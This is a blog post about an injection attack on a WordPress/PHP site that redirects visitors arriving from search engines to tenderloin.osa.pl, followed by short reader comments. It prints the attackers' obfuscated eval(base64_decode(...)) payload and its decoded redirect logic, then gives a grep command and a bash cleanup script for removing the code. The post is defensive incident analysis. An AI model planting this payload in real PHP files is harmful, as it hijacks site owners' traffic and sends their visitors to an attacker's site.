So earlier today I noticed a discrepancy in traffic to question-defense.com and because of a previous incident I knew exactly where to look. Sure enough a similar attack had been performed which we are coining Search Engine Click Jacking. In this case we are sure that a single files permissions were left open and the attackers were able to write PHP into the file which caused traffic being referred to our site from many of the major search engines to be redirected to tenderloin.osa.pl. Our site is built using WordPress however any site built in PHP with incorrect permissions on any files are vulnerable to this type of attack. Below is more information about the attack, how to search for the attack, and a simple bash script that will remove the infected code from PHP files on your web site.
Search Engine Click Jacking To tenderloin.osa.pl
This is a fairly clever attack that writes a minimal amount of code into vulnerable PHP files on your web site. The code is added to any PHP files where permissions are not configured properly and the web server user can write to the file. Below is a sample of the code that is injected into the PHP files followed by the decoded version of the base64 insert.
Encoded Base64 Code Inserted Into Vulnerable PHP Files:
- eval(base64_decode("ZXJyb3JfcmVwb3J0aW5nKDApOw0KJHFhenBsbT1oZWFkZXJzX3NlbnQoKTsNCmlmICghJHFhenBsbSl7DQokcmVmZXJlcj0kX1NFUlZFUlsnSFRUUF9SRUZFUkVSJ107DQokdWFnPSRfU0VSVkVSWydIVFRQX1VTRVJfQUdFTlQnXTsNCmlmICgkdWFnKSB7DQppZiAoc3RyaXN0cigkcmVmZXJlciwieWFuZGV4Iikgb3Igc3RyaXN0cigkcmVmZXJlciwieWFob28iKSBvciBzdHJpc3RyKCRyZWZlcmVyLCJnb29nbGUiKSBvciBzdHJpc3RyKCRyZWZlcmVyLCJiaW5nIikgb3Igc3RyaXN0cigkcmVmZXJlciwicmFtYmxlciIpIG9yIHN0cmlzdHIoJHJlZmVyZXIsImdvZ28iKSBvciBzdHJpc3RyKCRyZWZlcmVyLCJsaXZlLmNvbSIpb3Igc3RyaXN0cigkcmVmZXJlciwiYXBvcnQiKSBvciBzdHJpc3RyKCRyZWZlcmVyLCJuaWdtYSIpIG9yIHN0cmlzdHIoJHJlZmVyZXIsIndlYmFsdGEiKSBvciBzdHJpc3RyKCRyZWZlcmVyLCJiYWlkdS5jb20iKSBvciBzdHJpc3RyKCRyZWZlcmVyLCJkb3VibGVjbGljay5uZXQiKSBvciBzdHJpc3RyKCRyZWZlcmVyLCJiZWd1bi5ydSIpIG9yIHN0cmlzdHIoJHJlZmVyZXIsInN0dW1ibGV1cG9uLmNvbSIpIG9yIHN0cmlzdHIoJHJlZmVyZXIsImJpdC5seSIpIG9yIHN0cmlzdHIoJHJlZmVyZXIsInRpbnl1cmwuY29tIikgb3Igc3RyaXN0cigkcmVmZXJlciwiY2xpY2tiYW5rLm5ldCIpIG9yIHN0cmlzdHIoJHJlZmVyZXIsImJsb2dzcG90LmNvbSIpIG9yIHN0cmlzdHIoJHJlZmVyZXIsIm15c3BhY2UuY29tIikgb3Igc3RyaXN0cigkcmVmZXJlciwiZmFjZWJvb2suY29tIikgb3Igc3RyaXN0cigkcmVmZXJlciwiYW9sLmNvbSIpKSB7DQppZiAoIXN0cmlzdHIoJHJlZmVyZXIsImNhY2hlIikgb3IgIXN0cmlzdHIoJHJlZmVyZXIsImludXJsIikpew0KCWhlYWRlcigiTG9jYXRpb246IGh0dHA6Ly90ZW5kZXJsb2luLm9zYS5wbC8iKTsNCglleGl0KCk7DQp9DQp9DQoJfQ0KCX0="));
Decoded Base64 Code Inserted Into Vulnerable PHP Files:
- error_reporting(0);
- $qazplm=headers_sent();
- if (!$qazplm){
- $referer=$_SERVER['HTTP_REFERER'];
- $uag=$_SERVER['HTTP_USER_AGENT'];
- if ($uag) {
- if (stristr($referer,"yandex") or stristr($referer,"yahoo") or stristr($referer,"google") or stristr($referer,"bing") or stristr($referer,"rambler") or stristr($referer,"gogo") or stristr($referer,"live.com")or stristr($referer,"aport") or stristr($referer,"nigma") or stristr($referer,"webalta") or stristr($referer,"baidu.com") or stristr($referer,"doubleclick.net") or stristr($referer,"begun.ru") or stristr($referer,"stumbleupon.com") or stristr($referer,"bit.ly") or stristr($referer,"tinyurl.com") or stristr($referer,"clickbank.net") or stristr($referer,"blogspot.com") or stristr($referer,"myspace.com") or stristr($referer,"facebook.com") or stristr($referer,"aol.com")) {
- if (!stristr($referer,"cache") or !stristr($referer,"inurl")){
- header("Location: http://tenderloin.osa.pl/");
- exit();
- }
- }
- }
- }
As you can see above the code simply performs a 302 redirect on any traffic to your site that is referred from yandex, yahoo, google, bing, rambler, live.com, gogo, aport, webalta, nigma, baidu, doubleclick.net, stumbledupon.com, bit.ly, tinyurl.com, clickbank.net, blogspot.com, myspace.com, facebook.com, or aol.com. The nifty part about this type of attack is that when a web developer visits the site they will think everything is fine since a web developer would rarely search for their own site to visit it however many sites get most of their traffic reffered to from sites such as Google.
I was able to duplicate the problem fairly quickly using curl from the Linux CLI and the Spoofy Chrome extension since I have seen similar Search Engine Click Jacking attacks before. Resolving this issue is fairly simple as you can first see how many files are infected by using grep such as the example below.
Example grep Command To Locate Infected PHP Files:
- grep -r base64 * | less
Be prepared for a lot of output depending on how many PHP files they have infected. To fix the issue first make sure that the files that have had new code added to them have the permissions changed to something that will not allow the web server user (many times apache) to write data to them. Once you have modified all of the file permissions to prevent this attack in the future you can use the below bash script to remove the inserted code. The script only removes the code from the directory from which its run so if there are multiple directories make sure to run it each time. We left the script simple so you would have to go into each directory where there are infected files and make sure that the permissions are set properly.
Bash Script To Remove Search Engine Click Jacking PHP Code:
- #!/bin/bash
- for fl in *.php; do
- mv $fl $fl.old
- sed 's/eval(base64_decode("ZXJyb3JfcmVwb3J0aW5nKDApOw0KJHFhenBsbT1oZWFkZXJzX3NlbnQoKTsNCmlmICghJHFhenBsbSl7DQokcmVmZXJlcj0kX1NFUlZFUlsnSFRUUF9SRUZFUkVSJ107DQokdWFnPSRfU0VSVkVSWydIVFRQX1VTRVJfQUdFTlQnXTsNCmlmICgkdWFnKSB7DQppZiAoc3RyaXN0cigkcmVmZXJlciwieWFuZGV4Iikgb3Igc3RyaXN0cigkcmVmZXJlciwieWFob28iKSBvciBzdHJpc3RyKCRyZWZlcmVyLCJnb29nbGUiKSBvciBzdHJpc3RyKCRyZWZlcmVyLCJiaW5nIikgb3Igc3RyaXN0cigkcmVmZXJlciwicmFtYmxlciIpIG9yIHN0cmlzdHIoJHJlZmVyZXIsImdvZ28iKSBvciBzdHJpc3RyKCRyZWZlcmVyLCJsaXZlLmNvbSIpb3Igc3RyaXN0cigkcmVmZXJlciwiYXBvcnQiKSBvciBzdHJpc3RyKCRyZWZlcmVyLCJuaWdtYSIpIG9yIHN0cmlzdHIoJHJlZmVyZXIsIndlYmFsdGEiKSBvciBzdHJpc3RyKCRyZWZlcmVyLCJiYWlkdS5jb20iKSBvciBzdHJpc3RyKCRyZWZlcmVyLCJkb3VibGVjbGljay5uZXQiKSBvciBzdHJpc3RyKCRyZWZlcmVyLCJiZWd1bi5ydSIpIG9yIHN0cmlzdHIoJHJlZmVyZXIsInN0dW1ibGV1cG9uLmNvbSIpIG9yIHN0cmlzdHIoJHJlZmVyZXIsImJpdC5seSIpIG9yIHN0cmlzdHIoJHJlZmVyZXIsInRpbnl1cmwuY29tIikgb3Igc3RyaXN0cigkcmVmZXJlciwiY2xpY2tiYW5rLm5ldCIpIG9yIHN0cmlzdHIoJHJlZmVyZXIsImJsb2dzcG90LmNvbSIpIG9yIHN0cmlzdHIoJHJlZmVyZXIsIm15c3BhY2UuY29tIikgb3Igc3RyaXN0cigkcmVmZXJlciwiZmFjZWJvb2suY29tIikgb3Igc3RyaXN0cigkcmVmZXJlciwiYW9sLmNvbSIpKSB7DQppZiAoIXN0cmlzdHIoJHJlZmVyZXIsImNhY2hlIikgb3IgIXN0cmlzdHIoJHJlZmVyZXIsImludXJsIikpew0KCWhlYWRlcigiTG9jYXRpb246IGh0dHA6Ly90ZW5kZXJsb2luLm9zYS5wbC8iKTsNCglleGl0KCk7DQp9DQp9DQoJfQ0KCX0="));/ /g' $fl.old > $fl
- rm -f $fl.old
- done
The specific base64 code may actually be different on your site so if that is the case you simply need to replace the text in the script starting with “eval(base64_decode(” and ending with “Q0KCX0=”));”. Also if you want to keep a backup of the files that are being modified you could comment out the “rm -f $fl.old” line and each file will be saved with a .old extension.
Gracias amigo, me ayudaste a resolver el problema :) utilicé el programa “FileSeek” para encontrar el término “eval(base64_decode(” y apareció de inmediato, lo borré de loa archivos vulnerados y aumentle la seguridad de los mismos.
Thank you very much!
Hello o_o,
No problem man. Glad to hear it helped out and thanks for taking the time to leave feedback.
Thanks.
alex